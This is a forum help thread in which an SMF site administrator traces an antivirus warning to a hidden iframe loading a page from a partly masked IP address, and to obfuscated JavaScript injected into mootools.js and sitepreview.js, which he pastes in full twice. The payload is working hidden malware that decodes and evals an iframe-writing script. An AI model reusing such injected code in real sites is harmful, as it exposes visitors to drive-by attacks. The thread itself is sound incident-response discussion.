A couple days ago users of our site began to get warnings from virus software. Our site is now being reported as a risk.
I have gone through much of the site, including the database and can find nothing changed.
When checking the site through a console web program, I can find this code being run:
<iframe width="1" height="1" src="http://178.208.xx.xxx/go.php?sid=1" frameBorder="0">
Which I believe to be the link causing the data being pulled from a malicious site.
However, I cannot find in any file or any where on the site with that bit of code.
Any ideas on how I can track down what is executing this?
Currently running 1.1.14
Site is here: http://ksguild.org/index.php
The code itself is probably encoded (encrypted). Look for the string "decode" (as in, base64_decode) or for random-looking data in a function. Especially look at the beginning and end of files -- usually stuff like this gets tacked on there, rather than being inserted in the middle of a file (risking breaking it).
Thanks for the response.
I have checked all files on the site, that code is not present.
I have also done as you suggested and looked for decode statements... Were several, but all were legitimate so far as I can tell.
Previously I checked modified dates, and no files have been modified recently.
Any other suggestions?
In the 5 years or so we have used smf, this is the first time we have had any kind of issue with security. Beating my head against the wall trying to figure out where these extra calls are coming from.
The sites it calls changes frequently, but the above IP is always called.
I added an .htaccess to block that ip, but I would like to find how/where this code is getting executed.
If I was you I would take a full backup of the database and then delete all files in your SMF directory and re-upload the SMF files, you will have to redo any customisations but its a sure-fire way to make sure no SMF files are infected with malicious code.
If you checked all smf files especially those ending with index.php, check your block codes on your tp98.
The easiest way to find that code would be to use a text editor that's capable of searching entire directories (Notepad++, etc. - neither text editor that's included with Windows has this option).
Alternately, if you have shell access, login to the shell and run this command, replacing "/path/to/your/forum" with the actual path to your SMF directory:
grep -r "iframe" /path/to/your/forum
I don't think that should return any false positives, as SMF shouldn't have anything with "iframe" in it by default.
Thanks for the help all, finally tracked it down.
First thing I tried Oldiesmann. :) Love notepad++
Unfortunately, since it was a bit of js, it didn't actually have iframe or any of the other elements I saw executing.
It was quite elusive...
I found an extra bit of code tacked onto a js file used by TP. (mootools.js)
Removed the code and everything is fine now.
Now I just need to figure out how they did it, so I can prevent it from happening again.
Any ideas on how they may have accomplished this (or how to prevent it)? I checked through both the forum log and servers logs, didn't find anything.
maybe it is a line that comes in that file when you installed it? have you checked that first?
When I found that bit of code, I checked it against a backup I had of the file in question, the backup did not have that code. So somehow it was added to the file.
have you asked your host about it? maybe there is an issue with the server.
I have not checked with our hosting service.... but prolly not a bad idea to do so. :)
It could be code you're using to display the Iowa news. Im guessing it uses .js
Rss?
Lainaus käyttäjältä: bluedevil - syyskuu 07, 2011, 01:17:01 IP
It could be code you're using to display the Iowa news. Im guessing it uses .js
Rss?
Wrong site, this is the ksguild site. The Iowa site is more an old experiment that I don't really use much.... been meaning to update it to 2.0, just haven't got around to it.
it must be happened because of a ftp login from a virus infected computer.. Me myself had issues same like that.. I was in my friend's house and his PC was infected from viruses and I logged into the FTP of one of my site and just after 10 seconds my site's php files got infected by some codes...
So BE careful about ftp logins
who is your host?
Dreamhost.
Have been using them for 5 yrs and have never had much of an issue.
have you checked your sha1.js file?
I have checked all files and the database, only file affected was one I listed. I do have that file (sha1.js), but it is fine.
My only thought now is perhaps a mod or something I haven't updated has a vulnerability. I will be updating everything as I have time over the next few days. For instance, I am using an older version of tp (tiny portal), it was a tp file affected.
Since I removed that code added to that file, I have had no other issues. Still don't know exactly how the file was modified.
strange
What I find interesting is that it is identical code (as far as I can tell) added to the js file as in the other thread.
String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}
n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);
Found a file on another of my sites (its on a separate server as my other site) which had the same code injected. File was sitepreview.js.
String.prototype.test="harC";for(i in $='')if(i=='test')m=$[i];var ss="";try{eval('asdas')}catch(q){s=String["fr"+"omC"+m+"od"+'e'];}d=new Date();d2=new Date(d.valueOf()-2);Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('sd'))throw 1;}catch(q){n=-1*(d-d2);}
n=[98-n,109-n,97-n,115-n,107-n,99-n,108-n,114-n,44-n,117-n,112-n,103-n,114-n,99-n,38-n,32-n,58-n,103-n,100-n,112-n,95-n,107-n,99-n,30-n,113-n,112-n,97-n,59-n,37-n,102-n,114-n,114-n,110-n,56-n,45-n,45-n,47-n,53-n,54-n,44-n,48-n,46-n,54-n,44-n,54-n,48-n,44-n,47-n,47-n,49-n,45-n,101-n,109-n,44-n,110-n,102-n,110-n,61-n,113-n,103-n,98-n,59-n,47-n,37-n,30-n,117-n,103-n,98-n,114-n,102-n,59-n,37-n,47-n,37-n,30-n,102-n,99-n,103-n,101-n,102-n,114-n,59-n,37-n,47-n,37-n,30-n,100-n,112-n,95-n,107-n,99-n,96-n,109-n,112-n,98-n,99-n,112-n,59-n,37-n,46-n,37-n,60-n,58-n,45-n,103-n,100-n,112-n,95-n,107-n,99-n,60-n,32-n,39-n,57-n];for(i=0;i<n.length;i++)ss+=s(eval("n"+"["+"i"+"]"));eval(ss);
This site also has a different log in and so on... so I know it wasn't through ftp.
what mods do you have installed on both sites? do you know what mod/theme installed that file?
It was a site preview mod (for links).
ksguild is heavily modded. Plus I have several of my own custom edits. This other site really has nothing in common except it uses smf (an outdated version).
The site is quite outdated.... don't really use it.
I am currently deleting the whole site and doing a fresh upload of 2.0.
How did that work out?
Currently have 2 sites updated to 2.0, looking good. :)
Both are in my sig.
Glad you were able to get rid of the bad file.